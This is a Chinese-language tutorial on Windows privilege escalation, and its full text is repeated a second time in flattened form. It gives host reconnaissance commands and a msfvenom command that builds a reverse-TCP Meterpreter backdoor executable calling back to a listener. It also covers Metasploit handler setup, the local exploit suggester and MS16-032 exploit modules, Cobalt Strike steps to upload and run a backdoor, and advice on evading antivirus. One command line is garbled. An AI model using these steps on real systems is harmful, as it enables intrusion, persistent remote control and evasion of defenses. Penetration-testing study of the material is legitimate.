Windows权限提升技术详解

一、Windows权限基础

1.1 默认用户组权限

Windows系统内置了多个本地用户组，每个组拥有不同的权限：

管理员组(Administrators)：拥有大部分计算机操作权限，能修改系统设置和所有文件
高权限用户组(Power Users)：能执行大部分操作，但不能修改系统设置
普通用户组(Users)：受限在自己的用户空间，不能处理其他用户文件
备份操作组(Backup Operators)：用于系统维护
文件复制组(Replicator)：用于系统维护
来宾用户组(Guests)：文件操作权限同Users组，程序执行权限更少
身份验证用户组(Authenticated users)：所有通过验证登录的用户

1.2 特殊权限成员

SYSTEM：系统账户，拥有完全访问权
Trustedinstaller：信任程序模块账户
Everyone：所有人，权限类似Users组
CREATOR OWNER：文件创建者专有权限

二、权限获取方法分类

后台权限：SQL注入、数据库备份泄露、默认/弱口令
网站权限：后台提升、RCE漏洞、文件操作类漏洞、反序列化漏洞
数据库权限：SQL注入、备份泄露、弱口令、从网站权限转入
接口权限：SQL注入、源码泄漏、配置不当、从网站权限转入
系统权限：高危系统漏洞、从网站/数据库权限提升、第三方服务
域控权限：高危漏洞、内网横向渗透、域控服务漏洞

三、信息收集命令

systeminfo          # 打印系统信息
tasklist /svc       # 显示进程及服务
whoami              # 当前用户名
whoami /priv        # 当前账户权限
ipconfig            # 网络配置
ipconfig /displaydns # DNS缓存
route print         # 路由表
arp -a              # ARP表
hostname            # 主机名
net user            # 列出用户
net user UserName   # 用户详细信息
net use \\SMBPATH Pa
$$
wOrd /u:UserName # 连接SMB
net localgroup      # 列出所有组
net localgroup GROUP # 组详细信息

四、MSF自动化提权

4.1 生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=监听端IP lport=8888 -f exe -o shell.exe

4.2 MSF监听设置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
exploit

4.3 提权方法

半自动化方式（根据补丁寻找漏洞）

use post/windows/gather/enum_patches
set session 1
exploit

全自动化方式（漏洞建议）

use post/multi/recon/local_exploit_suggester
set session 1
set showdescription true
exploit

示例漏洞利用（MS16-032）

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
set lhost 0.0.0.0
set lport 6666
exploit

五、Cobalt Strike插件化提权

创建监听器
生成Windows可执行后门
上传并执行后门
在会话中设置延迟为0：sleep 0
使用插件进行一键提权（可从GitHub获取相关插件）

六、在线提权平台

将systeminfo命令结果复制到在线提权平台（如Windows Exploit Suggester），取消勾选"远程代码执行"选项，分析可能的漏洞。

七、注意事项

遇到杀毒软件需进行免杀处理
信息收集阶段应判断是否存在杀毒软件
权限可以叠加使用，不是覆盖关系
管理员和SYSTEM可以忽略大多数文件访问限制（除非使用NTFS加密）

八、防御建议

及时安装系统补丁
使用强密码策略
限制用户权限（遵循最小权限原则）
部署杀毒软件和入侵检测系统
监控异常进程和网络连接
禁用不必要的服务和账户

Windows权限提升技术详解一、Windows权限基础 1.1 默认用户组权限 Windows系统内置了多个本地用户组，每个组拥有不同的权限：管理员组(Administrators) ：拥有大部分计算机操作权限，能修改系统设置和所有文件高权限用户组(Power Users) ：能执行大部分操作，但不能修改系统设置普通用户组(Users) ：受限在自己的用户空间，不能处理其他用户文件备份操作组(Backup Operators) ：用于系统维护文件复制组(Replicator) ：用于系统维护来宾用户组(Guests) ：文件操作权限同Users组，程序执行权限更少身份验证用户组(Authenticated users) ：所有通过验证登录的用户 1.2 特殊权限成员 SYSTEM ：系统账户，拥有完全访问权 Trustedinstaller ：信任程序模块账户 Everyone ：所有人，权限类似Users组 CREATOR OWNER ：文件创建者专有权限二、权限获取方法分类后台权限：SQL注入、数据库备份泄露、默认/弱口令网站权限：后台提升、RCE漏洞、文件操作类漏洞、反序列化漏洞数据库权限：SQL注入、备份泄露、弱口令、从网站权限转入接口权限：SQL注入、源码泄漏、配置不当、从网站权限转入系统权限：高危系统漏洞、从网站/数据库权限提升、第三方服务域控权限：高危漏洞、内网横向渗透、域控服务漏洞三、信息收集命令四、MSF自动化提权 4.1 生成后门 4.2 MSF监听设置 4.3 提权方法半自动化方式（根据补丁寻找漏洞）全自动化方式（漏洞建议）示例漏洞利用（MS16-032）五、Cobalt Strike插件化提权创建监听器生成Windows可执行后门上传并执行后门在会话中设置延迟为0： sleep 0 使用插件进行一键提权（可从GitHub获取相关插件）六、在线提权平台将 systeminfo 命令结果复制到在线提权平台（如Windows Exploit Suggester），取消勾选"远程代码执行"选项，分析可能的漏洞。七、注意事项遇到杀毒软件需进行免杀处理信息收集阶段应判断是否存在杀毒软件权限可以叠加使用，不是覆盖关系管理员和SYSTEM可以忽略大多数文件访问限制（除非使用NTFS加密）八、防御建议及时安装系统补丁使用强密码策略限制用户权限（遵循最小权限原则）部署杀毒软件和入侵检测系统监控异常进程和网络连接禁用不必要的服务和账户